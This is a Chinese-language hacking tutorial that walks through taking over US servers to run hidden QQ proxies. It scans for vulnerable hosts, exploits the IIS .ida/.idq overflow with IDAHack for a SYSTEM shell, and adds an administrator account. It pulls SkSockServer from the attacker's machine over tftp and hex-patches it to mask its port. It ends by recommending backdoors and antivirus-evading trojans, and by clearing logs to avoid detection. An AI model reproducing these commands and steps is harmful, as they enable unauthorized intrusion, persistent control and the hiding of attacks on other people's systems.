闲来无事，找了几台美国老的机器做qq的代理，实现QQ隐藏ip，什么日本，韩国，台湾的都可以，哈哈～～不过发现自己的QQ显示端口都是1040，1041之类，当和一些大虾聊天的时候他们也知道我用跳板上QQ ，因为他们的也是1040之类的，那如何实现让别人不知道你用的是代理呢？可以让代理的udp端口用4000来代理，这样别人就不会知道了：P 废话就不多说了，下面干活：

先祭出我们敬爱的榕G的流光4.7，对准美国的ip开始扫描，（呵呵～～对于初学者，流光可是个好东东哦）砌杯茶，运气好的话我们可以得到好多有漏洞的主机，那我们就以简单的.ida.idq漏洞为例： 用sunx的IDAHack.exe溢出工具试试系统装没装PACK,或PACK1 PACK2 结果装了PACK2，我们就这样：

G:\tool>IDAHack xxx.xxx.xxx.xxx 80 6 999index server 2 overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, :p

connecting...sending...checking...Now you can telnet to 999 portgood luck :)

对方溢出成功，我们得到999端口一个得到localsystem权限的shell，然后我们telnet到999端口

G:\tool>telnet xxx.xxx.xxxx.xxx 999

C:\WINNT\system32>net user vitter Aa741--- /add //添加一个vitter用户，密码写长点是害怕对方配置了密码策略,带来麻烦。C:\WINNT\system32>net localgroup administrators vitter /add //把vitter添加到administrators组中。接下来: net use i: \\xxx.xxx.xxx\C$ "Aa741---" /user:"vitter" 出有问题了：（ "远程计算机不可用" TMD!! 远程主机的tcp/ip协议未绑定netbios，该死的美国老!!

然后回到ida溢出的shellC:\WINNT\system32>net start telnet,然后溢出 成功! 对方开了23 端口，再在自己的机器上建立vitter用户,密码:Aa741---,用此用户开个CMD_windows (这是干什么详见.abu.的文章"最快速登陆2000telnet") 然后 telnet xxx.xxx.xxx.xxx这样我们退出idq溢出的shell时间长了可能会引起iis死。C:\WINNT\system32>tftp -i yourADD get SkSockServer.exe //上传SkSockServer.exe（我用的是v1.09），本地机器开tftpserver，SkSockServer.exe是经过我们修改过的，为什么修改呢？那是因为SkSockServer.exe v1.09默认的UDP端口都是1025，这样代理的话，别人就会发现你用了代理了。下面介绍怎么修改SkSockServer.exe v1.09：

工具：UltraEdit-32 （这个东东知道怎么用吧！）

用UltraEdit.exe 打开SkSockServer.exe(v1.09)。。。找到00003720h: 14 66 C7 44 24 10 02 00 89 44 24 18 BE 01 04 00 ;这组数据是16进制的，最高是ffff也就是65535。。。编译生成exe的时候错了一下位。。。知道原理这样你就随便改你想要的端口了。。。v1.09默认的UDP端口都是1025,所以相应修改0104就行。改成你想要用的端口，如果你想要人家看到你的端口是8888，将0104改成B822......

然后C:\WINNT\system32>SkSockServer -Install //安装skserver

C:\WINNT\system32>SkSockServer -config Port 8888 //指定skserver端口

C:\WINNT\system32>SkSockServer -config StartType 2 //指定skserver启动类型

C:\WINNT\system32>net start skserver //启动skserver服务

呵呵～～这样代理主机已经做好，临走之前留个后门，上传一个winshell之类的或者我主页上经过我修改了的wollf（可以逃过大多数杀毒软件的查杀），还可以上传一个asp木马，我论坛有的：）然后删掉我们建立的用户，清理日志，一定要擦好pp哟，如果你想长期用它做代理的话：）